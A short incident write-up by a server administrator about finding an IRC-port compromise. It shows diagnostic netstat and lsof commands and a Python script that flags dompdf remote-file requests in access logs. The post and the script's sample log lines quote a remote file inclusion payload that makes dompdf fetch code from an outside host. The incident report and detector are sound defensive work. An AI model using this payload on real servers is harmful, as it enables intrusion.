Today I noticed high CPU usage on one of my servers, and I got a warning email from RKhunter. The RKhunter log told me that port 6667 was open. After this I did a:

    netstat -nap | grep 6667

and yes. This did not look good. So I did a:

    lsof -i tcp:6667

Googling the IPs gave me more info and showed me that it's pointing to some bad scripts.

The "hacker" got in through a website on my server that was running dompdf (PHP code to generate .pdf files). They injected scripts by calling dompdf like this:

    domain.tld/dompdf/dompdf.php?input_file=http://18.104.22.168/seguridad/myid.jpg?

My servers are all running in a XenServer environment, and as I make backups every week I reverted back to one week ago, and disabled dompdf on that site. I'm now going to look at the "hacked" XenServer backup and see what damage has been done.
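
One way to search a web server access log for requests like the one quoted above, as an added example that is not part of the original post: it flags any request to dompdf.php whose input_file parameter starts with a URL scheme (a generalization beyond http), including percent-encoded forms. The combined log format, the function name remote_input_file_hits, and every sample log line, address and timestamp are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Start of an Apache/nginx "combined" log line: client, time, request, status.
# Assumption: the server logs in this format.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)
# A value that begins with "scheme://" names a remote resource or stream wrapper.
REMOTE_SCHEME = re.compile(r'^\s*[a-z][a-z0-9+.-]*://', re.IGNORECASE)

# Constructed sample log lines (documentation address ranges, made-up times).
SAMPLE_LOG = [
    '198.51.100.4 - - [01/Jan/2024:10:00:00 +0000] '
    '"GET /dompdf/dompdf.php?input_file=invoice.html HTTP/1.1" 200 5120',
    '203.0.113.7 - - [01/Jan/2024:10:05:12 +0000] '
    '"GET /dompdf/dompdf.php?input_file=http://192.0.2.10/seguridad/myid.jpg? HTTP/1.1" 200 312',
    '203.0.113.7 - - [01/Jan/2024:10:05:40 +0000] '
    '"GET /dompdf/dompdf.php?input_file=http%3A%2F%2F192.0.2.10%2Fseguridad%2Fmyid.jpg%3F HTTP/1.1" 200 312',
    '198.51.100.4 - - [01/Jan/2024:10:06:00 +0000] '
    '"GET /index.php?page=about HTTP/1.1" 200 2048',
]

def remote_input_file_hits(lines, script="dompdf.php", param="input_file"):
    """Return one record per request that passes a URL to the script's parameter."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format request line
        url = urlsplit(m.group("target"))
        if not url.path.lower().endswith("/" + script):
            continue
        # parse_qs percent-decodes, so an encoded "http%3A%2F%2F" is caught too.
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            if REMOTE_SCHEME.match(value):
                hits.append({"client": m.group("client"), "time": m.group("time"),
                             "status": int(m.group("status")), "input_file": value})
    return hits

if __name__ == "__main__":
    for hit in remote_input_file_hits(SAMPLE_LOG):
        print(hit)
```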